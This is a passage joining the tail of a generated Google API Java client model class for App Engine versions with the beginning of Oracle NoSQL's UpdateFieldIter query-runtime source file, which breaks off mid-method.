https://github.com/google/google-api-java-client/issues/543 com.google.api.client.util.Data.nullOf(Library.class); } /** * Configures liveness health checking for instances. Unhealthy instances are stopped and replaced * with new instancesOnly returned in GET requests if view=FULL is set. * The value may be {@code null}. */ @com.google.api.client.util.Key private LivenessCheck livenessCheck; /** * A service with manual scaling runs continuously, allowing you to perform complex initialization * and rely on the state of its memory over time. Manually scaled versions are sometimes referred * to as "backends". * The value may be {@code null}. */ @com.google.api.client.util.Key private ManualScaling manualScaling; /** * Full path to the Version resource in the API. Example: * apps/myapp/services/default/versions/v1.@OutputOnly * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.String name; /** * Extra network settings. Only applicable in the App Engine flexible environment. * The value may be {@code null}. */ @com.google.api.client.util.Key private Network network; /** * Files that match this pattern will not be built into this version. Only applicable for Go * runtimes.Only returned in GET requests if view=FULL is set. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.String nobuildFilesRegex; /** * Configures readiness health checking for instances. Unhealthy instances are not put into the * backend traffic rotation.Only returned in GET requests if view=FULL is set. * The value may be {@code null}. */ @com.google.api.client.util.Key private ReadinessCheck readinessCheck; /** * Machine resources for this version. Only applicable in the App Engine flexible environment. * The value may be {@code null}. */ @com.google.api.client.util.Key private Resources resources; /** * Desired runtime. Example: python27. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.String runtime; /** * The version of the API in the given runtime environment. Please see the app.yaml reference for * valid values at https://cloud.google.com/appengine/docs/standard//config/appref * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.String runtimeApiVersion; /** * The channel of the runtime to use. Only available for some runtimes. Defaults to the default * channel. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.String runtimeChannel; /** * The path or name of the app's main executable. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.String runtimeMainExecutablePath; /** * Current serving status of this version. Only the versions with a SERVING status create * instances and can be billed.SERVING_STATUS_UNSPECIFIED is an invalid value. Defaults to * SERVING. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.String servingStatus; /** * Whether multiple requests can be dispatched to this version at once. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.Boolean threadsafe; /** * Serving URL for this version. Example: "https://myversion-dot-myservice-dot- * myapp.appspot.com"@OutputOnly * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.String versionUrl; /** * Whether to deploy this version in a container on a virtual machine. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.lang.Boolean vm; /** * Enables VPC connectivity for standard apps. * The value may be {@code null}. */ @com.google.api.client.util.Key private VpcAccessConnector vpcAccessConnector; /** * The Google Compute Engine zones that are supported by this version in the App Engine flexible * environment. Deprecated. * The value may be {@code null}. */ @com.google.api.client.util.Key private java.util.List<java.lang.String> zones; /** * Serving configuration for Google Cloud Endpoints * (https://cloud.google.com/appengine/docs/python/endpoints/).Only returned in GET requests if * view=FULL is set. * @return value or {@code null} for none */ public ApiConfigHandler getApiConfig() { return apiConfig; } /** * Serving configuration for Google Cloud Endpoints * (https://cloud.google.com/appengine/docs/python/endpoints/).Only returned in GET requests if * view=FULL is set. * @param apiConfig apiConfig or {@code null} for none */ public Version setApiConfig(ApiConfigHandler apiConfig) { this.apiConfig = apiConfig; return this; } /** * Automatic scaling is based on request rate, response latencies, and other application metrics. * Instances are dynamically created and destroyed as needed in order to handle traffic. * @return value or {@code null} for none */ public AutomaticScaling getAutomaticScaling() { return automaticScaling; } /** * Automatic scaling is based on request rate, response latencies, and other application metrics. * Instances are dynamically created and destroyed as needed in order to handle traffic. * @param automaticScaling automaticScaling or {@code null} for none */ public Version setAutomaticScaling(AutomaticScaling automaticScaling) { this.automaticScaling = automaticScaling; return this; } /** * A service with basic scaling will create an instance when the application receives a request. * The instance will be turned down when the app becomes idle. Basic scaling is ideal for work * that is intermittent or driven by user activity. * @return value or {@code null} for none */ public BasicScaling getBasicScaling() { return basicScaling; } /** * A service with basic scaling will create an instance when the application receives a request. * The instance will be turned down when the app becomes idle. Basic scaling is ideal for work * that is intermittent or driven by user activity. * @param basicScaling basicScaling or {@code null} for none */ public Version setBasicScaling(BasicScaling basicScaling) { this.basicScaling = basicScaling; return this; } /** * Metadata settings that are supplied to this version to enable beta runtime features. * @return value or {@code null} for none */ public java.util.Map<String, java.lang.String> getBetaSettings() { return betaSettings; } /** * Metadata settings that are supplied to this version to enable beta runtime features. * @param betaSettings betaSettings or {@code null} for none */ public Version setBetaSettings(java.util.Map<String, java.lang.String> betaSettings) { this.betaSettings = betaSettings; return this; } /** * Environment variables available to the build environment.Only returned in GET requests if * view=FULL is set. * @return value or {@code null} for none */ public java.util.Map<String, java.lang.String> getBuildEnvVariables() { return buildEnvVariables; } /** * Environment variables available to the build environment.Only returned in GET requests if * view=FULL is set. * @param buildEnvVariables buildEnvVariables or {@code null} for none */ public Version setBuildEnvVariables(java.util.Map<String, java.lang.String> buildEnvVariables) { this.buildEnvVariables = buildEnvVariables; return this; } /** * Time that this version was created.@OutputOnly * @return value or {@code null} for none */ public String getCreateTime() { return createTime; } /** * Time that this version was created.@OutputOnly * @param createTime createTime or {@code null} for none */ public Version setCreateTime(String createTime) { this.createTime = createTime; return this; } /** * Email address of the user who created this version.@OutputOnly * @return value or {@code null} for none */ public java.lang.String getCreatedBy() { return createdBy; } /** * Email address of the user who created this version.@OutputOnly * @param createdBy createdBy or {@code null} for none */ public Version setCreatedBy(java.lang.String createdBy) { this.createdBy = createdBy; return this; } /** * Duration that static files should be cached by web proxies and browsers. Only applicable if the * corresponding StaticFilesHandler (https://cloud.google.com/appengine/docs/admin- * api/reference/rest/v1/apps.services.versions#StaticFilesHandler) does not specify its own * expiration time.Only returned in GET requests if view=FULL is set. * @return value or {@code null} for none */ public String getDefaultExpiration() { return defaultExpiration; } /** * Duration that static files should be cached by web proxies and browsers. Only applicable if the * corresponding StaticFilesHandler (https://cloud.google.com/appengine/docs/admin- * api/reference/rest/v1/apps.services.versions#StaticFilesHandler) does not specify its own * expiration time.Only returned in GET requests if view=FULL is set. * @param defaultExpiration defaultExpiration or {@code null} for none */ public Version setDefaultExpiration(String defaultExpiration) { this.defaultExpiration = defaultExpiration; return this; } /** * Code and application artifacts that make up this version.Only returned in GET requests if * view=FULL is set. * @return value or {@code null} for none */ public Deployment getDeployment() { return deployment; } /** * Code and application artifacts that make up this version.Only returned in GET requests if * view=FULL is set. * @param deployment deployment or {@code null} for none */ public Version setDeployment(Deployment deployment) { this.deployment = deployment; return this; } /** * Total size in bytes of all the files that are included in this version and currently hosted on * the App Engine disk.@OutputOnly * @return value or {@code null} for none */ public java.lang.Long getDiskUsageBytes() { return diskUsageBytes; } /** * Total size in bytes of all the files that are included in this version and currently hosted on * the App Engine disk.@OutputOnly * @param diskUsageBytes diskUsageBytes or {@code null} for none */ public Version setDiskUsageBytes(java.lang.Long diskUsageBytes) { this.diskUsageBytes = diskUsageBytes; return this; } /** * Cloud Endpoints configuration.If endpoints_api_service is set, the Cloud Endpoints Extensible * Service Proxy will be provided to serve the API implemented by the app. * @return value or {@code null} for none */ public EndpointsApiService getEndpointsApiService() { return endpointsApiService; } /** * Cloud Endpoints configuration.If endpoints_api_service is set, the Cloud Endpoints Extensible * Service Proxy will be provided to serve the API implemented by the app. * @param endpointsApiService endpointsApiService or {@code null} for none */ public Version setEndpointsApiService(EndpointsApiService endpointsApiService) { this.endpointsApiService = endpointsApiService; return this; } /** * The entrypoint for the application. * @return value or {@code null} for none */ public Entrypoint getEntrypoint() { return entrypoint; } /** * The entrypoint for the application. * @param entrypoint entrypoint or {@code null} for none */ public Version setEntrypoint(Entrypoint entrypoint) { this.entrypoint = entrypoint; return this; } /** * App Engine execution environment for this version.Defaults to standard. * @return value or {@code null} for none */ public java.lang.String getEnv() { return env; } /** * App Engine execution environment for this version.Defaults to standard. * @param env env or {@code null} for none */ public Version setEnv(java.lang.String env) { this.env = env; return this; } /** * Environment variables available to the application.Only returned in GET requests if view=FULL * is set. * @return value or {@code null} for none */ public java.util.Map<String, java.lang.String> getEnvVariables() { return envVariables; } /** * Environment variables available to the application.Only returned in GET requests if view=FULL * is set. * @param envVariables envVariables or {@code null} for none */ public Version setEnvVariables(java.util.Map<String, java.lang.String> envVariables) { this.envVariables = envVariables; return this; } /** * Custom static error pages. Limited to 10KB per page.Only returned in GET requests if view=FULL * is set. * @return value or {@code null} for none */ public java.util.List<ErrorHandler> getErrorHandlers() { return errorHandlers; } /** * Custom static error pages. Limited to 10KB per page.Only returned in GET requests if view=FULL * is set. * @param errorHandlers errorHandlers or {@code null} for none */ public Version setErrorHandlers(java.util.List<ErrorHandler> errorHandlers) { this.errorHandlers = errorHandlers; return this; } /** * An ordered list of URL-matching patterns that should be applied to incoming requests. The first * matching URL handles the request and other request handlers are not attempted.Only returned in * GET requests if view=FULL is set. * @return value or {@code null} for none */ public java.util.List<UrlMap> getHandlers() { return handlers; } /** * An ordered list of URL-matching patterns that should be applied to incoming requests. The first * matching URL handles the request and other request handlers are not attempted.Only returned in * GET requests if view=FULL is set. * @param handlers handlers or {@code null} for none */ public Version setHandlers(java.util.List<UrlMap> handlers) { this.handlers = handlers; return this; } /** * Configures health checking for instances. Unhealthy instances are stopped and replaced with new * instances. Only applicable in the App Engine flexible environment.Only returned in GET requests * if view=FULL is set. * @return value or {@code null} for none */ public HealthCheck getHealthCheck() { return healthCheck; } /** * Configures health checking for instances. Unhealthy instances are stopped and replaced with new * instances. Only applicable in the App Engine flexible environment.Only returned in GET requests * if view=FULL is set. * @param healthCheck healthCheck or {@code null} for none */ public Version setHealthCheck(HealthCheck healthCheck) { this.healthCheck = healthCheck; return this; } /** * Relative name of the version within the service. Example: v1. Version names can contain only * lowercase letters, numbers, or hyphens. Reserved names: "default", "latest", and any name with * the prefix "ah-". * @return value or {@code null} for none */ public java.lang.String getId() { return id; } /** * Relative name of the version within the service. Example: v1. Version names can contain only * lowercase letters, numbers, or hyphens. Reserved names: "default", "latest", and any name with * the prefix "ah-". * @param id id or {@code null} for none */ public Version setId(java.lang.String id) { this.id = id; return this; } /** * Before an application can receive email or XMPP messages, the application must be configured to * enable the service. * @return value or {@code null} for none */ public java.util.List<java.lang.String> getInboundServices() { return inboundServices; } /** * Before an application can receive email or XMPP messages, the application must be configured to * enable the service. * @param inboundServices inboundServices or {@code null} for none */ public Version setInboundServices(java.util.List<java.lang.String> inboundServices) { this.inboundServices = inboundServices; return this; } /** * Instance class that is used to run this version. Valid values are: AutomaticScaling: F1, F2, * F4, F4_1G ManualScaling or BasicScaling: B1, B2, B4, B8, B4_1GDefaults to F1 for * AutomaticScaling and B1 for ManualScaling or BasicScaling. * @return value or {@code null} for none */ public java.lang.String getInstanceClass() { return instanceClass; } /** * Instance class that is used to run this version. Valid values are: AutomaticScaling: F1, F2, * F4, F4_1G ManualScaling or BasicScaling: B1, B2, B4, B8, B4_1GDefaults to F1 for * AutomaticScaling and B1 for ManualScaling or BasicScaling. * @param instanceClass instanceClass or {@code null} for none */ public Version setInstanceClass(java.lang.String instanceClass) { this.instanceClass = instanceClass; return this; } /** * Configuration for third-party Python runtime libraries that are required by the * application.Only returned in GET requests if view=FULL is set. * @return value or {@code null} for none */ public java.util.List<Library> getLibraries() { return libraries; } /** * Configuration for third-party Python runtime libraries that are required by the * application.Only returned in GET requests if view=FULL is set. * @param libraries libraries or {@code null} for none */ public Version setLibraries(java.util.List<Library> libraries) { this.libraries = libraries; return this; } /** * Configures liveness health checking for instances. Unhealthy instances are stopped and replaced * with new instancesOnly returned in GET requests if view=FULL is set. * @return value or {@code null} for none */ public LivenessCheck getLivenessCheck() { return livenessCheck; } /** * Configures liveness health checking for instances. Unhealthy instances are stopped and replaced * with new instancesOnly returned in GET requests if view=FULL is set. * @param livenessCheck livenessCheck or {@code null} for none */ public Version setLivenessCheck(LivenessCheck livenessCheck) { this.livenessCheck = livenessCheck; return this; } /** * A service with manual scaling runs continuously, allowing you to perform complex initialization * and rely on the state of its memory over time. Manually scaled versions are sometimes referred * to as "backends". * @return value or {@code null} for none */ public ManualScaling getManualScaling() { return manualScaling; } /** * A service with manual scaling runs continuously, allowing you to perform complex initialization * and rely on the state of its memory over time. Manually scaled versions are sometimes referred * to as "backends". * @param manualScaling manualScaling or {@code null} for none */ public Version setManualScaling(ManualScaling manualScaling) { this.manualScaling = manualScaling; return this; } /** * Full path to the Version resource in the API. Example: * apps/myapp/services/default/versions/v1.@OutputOnly * @return value or {@code null} for none */ public java.lang.String getName() { return name; } /** * Full path to the Version resource in the API. Example: * apps/myapp/services/default/versions/v1.@OutputOnly * @param name name or {@code null} for none */ public Version setName(java.lang.String name) { this.name = name; return this; } /** * Extra network settings. Only applicable in the App Engine flexible environment. * @return value or {@code null} for none */ public Network getNetwork() { return network; } /** * Extra network settings. Only applicable in the App Engine flexible environment. * @param network network or {@code null} for none */ public Version setNetwork(Network network) { this.network = network; return this; } /** * Files that match this pattern will not be built into this version. Only applicable for Go * runtimes.Only returned in GET requests if view=FULL is set. * @return value or {@code null} for none */ public java.lang.String getNobuildFilesRegex() { return nobuildFilesRegex; } /** * Files that match this pattern will not be built into this version. Only applicable for Go * runtimes.Only returned in GET requests if view=FULL is set. * @param nobuildFilesRegex nobuildFilesRegex or {@code null} for none */ public Version setNobuildFilesRegex(java.lang.String nobuildFilesRegex) { this.nobuildFilesRegex = nobuildFilesRegex; return this; } /** * Configures readiness health checking for instances. Unhealthy instances are not put into the * backend traffic rotation.Only returned in GET requests if view=FULL is set. * @return value or {@code null} for none */ public ReadinessCheck getReadinessCheck() { return readinessCheck; } /** * Configures readiness health checking for instances. Unhealthy instances are not put into the * backend traffic rotation.Only returned in GET requests if view=FULL is set. * @param readinessCheck readinessCheck or {@code null} for none */ public Version setReadinessCheck(ReadinessCheck readinessCheck) { this.readinessCheck = readinessCheck; return this; } /** * Machine resources for this version. Only applicable in the App Engine flexible environment. * @return value or {@code null} for none */ public Resources getResources() { return resources; } /** * Machine resources for this version. Only applicable in the App Engine flexible environment. * @param resources resources or {@code null} for none */ public Version setResources(Resources resources) { this.resources = resources; return this; } /** * Desired runtime. Example: python27. * @return value or {@code null} for none */ public java.lang.String getRuntime() { return runtime; } /** * Desired runtime. Example: python27. * @param runtime runtime or {@code null} for none */ public Version setRuntime(java.lang.String runtime) { this.runtime = runtime; return this; } /** * The version of the API in the given runtime environment. Please see the app.yaml reference for * valid values at https://cloud.google.com/appengine/docs/standard//config/appref * @return value or {@code null} for none */ public java.lang.String getRuntimeApiVersion() { return runtimeApiVersion; } /** * The version of the API in the given runtime environment. Please see the app.yaml reference for * valid values at https://cloud.google.com/appengine/docs/standard//config/appref * @param runtimeApiVersion runtimeApiVersion or {@code null} for none */ public Version setRuntimeApiVersion(java.lang.String runtimeApiVersion) { this.runtimeApiVersion = runtimeApiVersion; return this; } /** * The channel of the runtime to use. Only available for some runtimes. Defaults to the default * channel. * @return value or {@code null} for none */ public java.lang.String getRuntimeChannel() { return runtimeChannel; } /** * The channel of the runtime to use. Only available for some runtimes. Defaults to the default * channel. * @param runtimeChannel runtimeChannel or {@code null} for none */ public Version setRuntimeChannel(java.lang.String runtimeChannel) { this.runtimeChannel = runtimeChannel; return this; } /** * The path or name of the app's main executable. * @return value or {@code null} for none */ public java.lang.String getRuntimeMainExecutablePath() { return runtimeMainExecutablePath; } /** * The path or name of the app's main executable. * @param runtimeMainExecutablePath runtimeMainExecutablePath or {@code null} for none */ public Version setRuntimeMainExecutablePath(java.lang.String runtimeMainExecutablePath) { this.runtimeMainExecutablePath = runtimeMainExecutablePath; return this; } /** * Current serving status of this version. Only the versions with a SERVING status create * instances and can be billed.SERVING_STATUS_UNSPECIFIED is an invalid value. Defaults to * SERVING. * @return value or {@code null} for none */ public java.lang.String getServingStatus() { return servingStatus; } /** * Current serving status of this version. Only the versions with a SERVING status create * instances and can be billed.SERVING_STATUS_UNSPECIFIED is an invalid value. Defaults to * SERVING. * @param servingStatus servingStatus or {@code null} for none */ public Version setServingStatus(java.lang.String servingStatus) { this.servingStatus = servingStatus; return this; } /** * Whether multiple requests can be dispatched to this version at once. * @return value or {@code null} for none */ public java.lang.Boolean getThreadsafe() { return threadsafe; } /** * Whether multiple requests can be dispatched to this version at once. * @param threadsafe threadsafe or {@code null} for none */ public Version setThreadsafe(java.lang.Boolean threadsafe) { this.threadsafe = threadsafe; return this; } /** * Serving URL for this version. Example: "https://myversion-dot-myservice-dot- * myapp.appspot.com"@OutputOnly * @return value or {@code null} for none */ public java.lang.String getVersionUrl() { return versionUrl; } /** * Serving URL for this version. Example: "https://myversion-dot-myservice-dot- * myapp.appspot.com"@OutputOnly * @param versionUrl versionUrl or {@code null} for none */ public Version setVersionUrl(java.lang.String versionUrl) { this.versionUrl = versionUrl; return this; } /** * Whether to deploy this version in a container on a virtual machine. * @return value or {@code null} for none */ public java.lang.Boolean getVm() { return vm; } /** * Whether to deploy this version in a container on a virtual machine. * @param vm vm or {@code null} for none */ public Version setVm(java.lang.Boolean vm) { this.vm = vm; return this; } /** * Enables VPC connectivity for standard apps. * @return value or {@code null} for none */ public VpcAccessConnector getVpcAccessConnector() { return vpcAccessConnector; } /** * Enables VPC connectivity for standard apps. * @param vpcAccessConnector vpcAccessConnector or {@code null} for none */ public Version setVpcAccessConnector(VpcAccessConnector vpcAccessConnector) { this.vpcAccessConnector = vpcAccessConnector; return this; } /** * The Google Compute Engine zones that are supported by this version in the App Engine flexible * environment. Deprecated. * @return value or {@code null} for none */ public java.util.List<java.lang.String> getZones() { return zones; } /** * The Google Compute Engine zones that are supported by this version in the App Engine flexible * environment. Deprecated. * @param zones zones or {@code null} for none */ public Version setZones(java.util.List<java.lang.String> zones) { this.zones = zones; return this; } @Override public Version set(String fieldName, Object value) { return (Version) super.set(fieldName, value); } @Override public Version clone() { return (Version) super.clone(); } }
oracle/nosql
35,797
kvmain/src/main/java/oracle/kv/impl/query/runtime/UpdateFieldIter.java
/*- * Copyright (C) 2011, 2025 Oracle and/or its affiliates. All rights reserved. * * This file was distributed by Oracle as part of a version of Oracle NoSQL * Database made available at: * * http://www.oracle.com/technetwork/database/database-technologies/nosqldb/downloads/index.html * * Please see the LICENSE file included in the top-level directory of the * appropriate version of Oracle NoSQL Database for a copy of the license and * additional information. */ package oracle.kv.impl.query.runtime; import java.io.DataInput; import java.io.DataOutput; import java.io.IOException; import java.math.BigDecimal; import java.util.ArrayList; import java.util.List; import java.util.Map; import java.util.Objects; import java.util.Set; import oracle.kv.impl.api.table.ArrayValueImpl; import oracle.kv.impl.api.table.DisplayFormatter; import oracle.kv.impl.api.table.FieldDefImpl; import oracle.kv.impl.api.table.FieldValueImpl; import oracle.kv.impl.api.table.JsonCollectionRowImpl; import oracle.kv.impl.api.table.JsonDefImpl; import oracle.kv.impl.api.table.MapValueImpl; import oracle.kv.impl.api.table.NullValueImpl; import oracle.kv.impl.api.table.RecordValueImpl; import oracle.kv.impl.api.table.RowImpl; import oracle.kv.impl.api.table.TableImpl; import oracle.kv.impl.api.table.TablePath; import oracle.kv.impl.api.table.Region; import oracle.kv.impl.query.QueryException; import oracle.kv.impl.query.QueryStateException; import oracle.kv.impl.query.compiler.Expr; import oracle.kv.impl.query.compiler.Expr.UpdateKind; import oracle.kv.table.FieldValue; /** * theUpdateKind: * The update kind (one of SET, ADD, PUT, JSON_MERGE_PATCH, or REMOVE) * * theInputIter: * Computes the target expression * * thePosIter: * Computes the position expression of an ADD clause, if present. * * theNewValueIter: * Computes the replacement values, in case of SET, or the new values, in * case of ADD/PUT. It's null for REMOVE. In case of SET for an MR_COUNTER * column, theNewValueIter is actually the iter that computes the increment * or decrement on the column. * * theTargetItemReg: * The register to store the value of the $ variable. * * theJsonMRCounterColPos: * If this update clause is a SET that updates a json column with MRCounters, * or updates something inside such a column, jsonMRCounterColPos will the * position of this column in the row. * * theIsJsonMRCounterUpdate: * True if this update clause is a SET that updates a json MRCounter. */ public class UpdateFieldIter extends PlanIter { static private class UpdateFieldState extends PlanIterState { RowImpl theRow; ParentItemContext theParentItemContext; final ArrayList<String> theKeysToRemove; final ArrayList<Integer> thePositionsToRemove; UpdateFieldState() { theParentItemContext = new ParentItemContext(); theKeysToRemove = new ArrayList<String>(32); thePositionsToRemove = new ArrayList<Integer>(32); } @Override public void reset(PlanIter iter) { super.reset(iter); theParentItemContext.reset(); theKeysToRemove.clear(); thePositionsToRemove.clear(); } } private final UpdateKind theUpdateKind; private final PlanIter theInputIter; private final PlanIter thePosIter; private final PlanIter theNewValueIter; private final boolean theIsMRCounterDec; private final int theJsonMRCounterColPos; private final boolean theIsJsonMRCounterUpdate; private final int theTargetItemReg; private final boolean theCloneNewValues; public UpdateFieldIter( Expr e, UpdateKind kind, PlanIter inputIter, PlanIter posIter, PlanIter newValueIter, int targetItemReg, boolean cloneNewValues, boolean isMRCounterDec, int jsonMRCounterColPos, boolean isJsonMRCounterUpdate) { super(e, -1); theUpdateKind = kind; theInputIter = inputIter; thePosIter = posIter; theNewValueIter = newValueIter; theTargetItemReg = targetItemReg; theCloneNewValues = cloneNewValues; theIsMRCounterDec = isMRCounterDec; theJsonMRCounterColPos = jsonMRCounterColPos; theIsJsonMRCounterUpdate = isJsonMRCounterUpdate; } public UpdateFieldIter(DataInput in, short serialVersion) throws IOException { super(in, serialVersion); short ordinal = readOrdinal(in, UpdateKind.VALUES_COUNT); theUpdateKind = UpdateKind.valueOf(ordinal); theInputIter = deserializeIter(in, serialVersion); thePosIter = deserializeIter(in, serialVersion); theNewValueIter = deserializeIter(in, serialVersion); theTargetItemReg = readPositiveInt(in, true); theCloneNewValues = in.readBoolean(); theIsMRCounterDec = in.readBoolean(); theJsonMRCounterColPos = in.readInt(); theIsJsonMRCounterUpdate = in.readBoolean(); } @Override public void writeFastExternal(DataOutput out, short serialVersion) throws IOException { super.writeFastExternal(out, serialVersion); out.writeShort(theUpdateKind.ordinal()); serializeIter(theInputIter, out, serialVersion); serializeIter(thePosIter, out, serialVersion); serializeIter(theNewValueIter, out, serialVersion); out.writeInt(theTargetItemReg); out.writeBoolean(theCloneNewValues); out.writeBoolean(theIsMRCounterDec); out.writeInt(theJsonMRCounterColPos); out.writeBoolean(theIsJsonMRCounterUpdate); } @Override public PlanIterKind getKind() { return PlanIterKind.UPDATE_FIELD; } public void setRow(RuntimeControlBlock rcb, RowImpl row) { UpdateFieldState state = (UpdateFieldState)rcb.getState(theStatePos); state.theRow = row; } @Override public void open(RuntimeControlBlock rcb) { rcb.setState(theStatePos, new UpdateFieldState()); theInputIter.open(rcb); if (thePosIter != null) { thePosIter.open(rcb); } if (theNewValueIter != null) { theNewValueIter.open(rcb); } } @Override public void close(RuntimeControlBlock rcb) { PlanIterState state = rcb.getState(theStatePos); if (state == null) { return; } theInputIter.close(rcb); if (thePosIter != null) { thePosIter.close(rcb); } if (theNewValueIter != null) { theNewValueIter.close(rcb); } state.close(); } @Override public void reset(RuntimeControlBlock rcb) { theInputIter.reset(rcb); if (thePosIter != null) { thePosIter.reset(rcb); } if (theNewValueIter != null) { theNewValueIter.reset(rcb); } PlanIterState state = rcb.getState(theStatePos); state.reset(this); } @Override public boolean next(RuntimeControlBlock rcb) { UpdateFieldState state = (UpdateFieldState)rcb.getState(theStatePos); if (state.isDone()) { return false; } boolean more = theInputIter.next(rcb); if (!more) { state.done(); return false; } boolean updated = false; while (more) { int inputReg = theInputIter.getResultReg(); FieldValueImpl targetItem = rcb.getRegVal(inputReg); switch (theUpdateKind) { case SET: { if (doSet(rcb, state, targetItem, null)) { updated = true; } break; } case ADD: { if (doAdd(rcb, targetItem)) { updated = true; } break; } case PUT: { if (doPut(rcb, targetItem)) { updated = true; } break; } case JSON_MERGE_PATCH: { if (doJsonMergePatch(rcb, state, targetItem)) { updated = true; } break; } case REMOVE: { /* * For each parent item, we must collect all the items to * remove, before actually removing them. This is because * removing the items immediately would invalide the * "iterator" in the path expr that produces these items. */ FieldValueImpl savedParentItem = state.theParentItemContext.theParentItem; theInputIter.getParentItemContext(rcb, state.theParentItemContext); FieldValueImpl parentItem = state.theParentItemContext.theParentItem; int targetPos = state.theParentItemContext.theTargetPos; String targetKey = state.theParentItemContext.theTargetKey; if (rcb.getTraceLevel() >= 3) { rcb.trace("Removing item :\n" + targetItem + "\nfrom parent item :\n" + parentItem); } if (parentItem.isRecord() && !(parentItem instanceof JsonCollectionRowImpl)) { throw new QueryException( "Cannot remove fields from records.\n" + "Field " + targetKey + "\nRecord:\n" + parentItem, theLocation); } if (parentItem.isNull()) { break; } if (savedParentItem == null || savedParentItem == parentItem) { if (targetKey != null) { assert(parentItem.isMap() || parentItem instanceof JsonCollectionRowImpl); state.theKeysToRemove.add(targetKey); } else { assert(parentItem.isArray()); state.thePositionsToRemove.add(targetPos); } } else { if (doRemove(state, savedParentItem)) { updated = true; } state.theKeysToRemove.clear(); state.thePositionsToRemove.clear(); if (targetKey != null) { assert(parentItem.isMap()); state.theKeysToRemove.add(targetKey); } else { assert(parentItem.isArray()); state.thePositionsToRemove.add(targetPos); } } break; } default: throw new QueryStateException( "Unexpected kind of update clause: " + theUpdateKind); } more = theInputIter.next(rcb); } if (theUpdateKind == UpdateKind.REMOVE && state.theParentItemContext.theParentItem != null && !state.theParentItemContext.theParentItem.isNull()) { if (doRemove(state, state.theParentItemContext.theParentItem)) { updated = true; } } state.done(); return updated; } private boolean doSet( RuntimeControlBlock rcb, UpdateFieldState state, FieldValueImpl targetItem, FieldValueImpl newTargetItem) { theInputIter.getParentItemContext(rcb, state.theParentItemContext); FieldValueImpl parentItem = state.theParentItemContext.theParentItem; int targetPos = state.theParentItemContext.theTargetPos; String targetKey = state.theParentItemContext.theTargetKey; if (parentItem.isNull()) { return false; } if (theTargetItemReg >= 0) { rcb.setRegVal(theTargetItemReg, targetItem); } boolean copyMRCounters = false; List<TablePath> mrCounterPaths = null; List<FieldValueImpl> mrCounterVals = null; if (theJsonMRCounterColPos >= 0 && !theIsJsonMRCounterUpdate) { copyMRCounters = true; mrCounterPaths = state.theRow.getTable(). getSchemaMRCounterPaths(theJsonMRCounterColPos); mrCounterVals = new ArrayList<FieldValueImpl>(mrCounterPaths.size()); for (TablePath path : mrCounterPaths) { FieldValueImpl val = state.theRow.evaluateScalarPath(path, 0); mrCounterVals.add(val); } } if (newTargetItem == null) { /* No need to call theNewValueIter.next(rcb) more than once, because * the new-value expr is wrapped by a conditional array constructor */ boolean more = theNewValueIter.next(rcb); if (!more) { theNewValueIter.reset(rcb); return false; } int inputReg = theNewValueIter.getResultReg(); newTargetItem = rcb.getRegVal(inputReg); if (theCloneNewValues && !newTargetItem.isAtomic()) { newTargetItem = newTargetItem.clone(); } } if (rcb.getTraceLevel() >= 1) { rcb.trace("SET:\nParentItem =\n" + parentItem + "\nTargetItem:\n" + targetItem + "\nNewValue:\n" + newTargetItem + "\ntarget pos = " + targetPos); } try { switch (parentItem.getType()) { case RECORD: { RecordValueImpl rec = (RecordValueImpl)parentItem; FieldDefImpl targetType; if (newTargetItem.isJsonNull()) { newTargetItem = NullValueImpl.getInstance(); } if (targetPos >= 0) { targetType = rec.getFieldDef(targetPos); } else if (parentItem instanceof JsonCollectionRowImpl) { targetType = FieldDefImpl.Constants.jsonDef; } else { targetType = rec.getFieldDef(targetKey); } newTargetItem = CastIter.castValue(newTargetItem, targetType, theLocation); if (targetItem.isMRCounter()) { newTargetItem = updateMRCounter(rcb, targetItem, newTargetItem); if (targetPos >= 0) { rec.putInternal(targetPos, newTargetItem, false); } else { rec.putInternal(targetKey, newTargetItem, false); } } else if (targetPos >= 0) { rec.put(targetPos, newTargetItem); } else { rec.put(targetKey, newTargetItem); } if (rcb.getTraceLevel() >= 1) { rcb.trace("SET DONE:\nParentItem after update =\n" + parentItem); } break; } case MAP: { MapValueImpl map = (MapValueImpl)parentItem; if (targetItem.isMRCounter()) { FieldDefImpl targetType = targetItem.getDefinition(); newTargetItem = CastIter.castValue(newTargetItem, targetType, theLocation); newTargetItem = updateMRCounter(rcb, targetItem, newTargetItem); } else { FieldDefImpl targetType = map.getElementDef(); newTargetItem = CastIter.castValue(newTargetItem, targetType, theLocation); } map.put(targetKey, newTargetItem); break; } case ARRAY: { ArrayValueImpl arr = (ArrayValueImpl)parentItem; FieldDefImpl targetType = arr.getElementDef(); newTargetItem = CastIter.castValue(newTargetItem, targetType, theLocation); arr.set(targetPos, newTargetItem); break; } default: throw new QueryStateException( "Field to SET is not contained in a record, map, or " + "array"); } if (mrCounterPaths != null && mrCounterVals != null && copyMRCounters) { for (int i = 0; i < mrCounterPaths.size(); ++i) { JsonDefImpl.insertMRCounterField(state.theRow, mrCounterPaths.get(i), mrCounterVals.get(i), true); } } } catch (IllegalArgumentException e) { throw new QueryException( "SET operation failed. Cause: " + e.getMessage(), theLocation); } theNewValueIter.reset(rcb); return true; } private FieldValueImpl updateMRCounter( RuntimeControlBlock rcb, FieldValueImpl targetItem, FieldValueImpl newTargetItem) { if (newTargetItem.isNull()) { throw new QueryException("Cannot set an MR_COUNTER field to NULL", theLocation); } FieldValueImpl diffVal; if (targetItem.isInteger()) { int diff = newTargetItem.castAsInt(); diffVal = FieldDefImpl.Constants.integerDef.createInteger(diff); newTargetItem = targetItem.clone(); } else if (targetItem.isLong()) { long diff = newTargetItem.castAsLong(); diffVal = FieldDefImpl.Constants.longDef.createLong(diff); newTargetItem = targetItem.clone(); } else { BigDecimal diff = newTargetItem.castAsDecimal(); diffVal = FieldDefImpl.Constants.numberDef.createNumber(diff); newTargetItem = targetItem.clone(); } /* * Get local region id for CRDT * * Normal table may also has CRDT field, updating CRDT always requires * non zero region id. */ int regionId; UpdateFieldState state = (UpdateFieldState)rcb.getState(theStatePos); if (state.theRow.isFromMRTable()) { regionId = 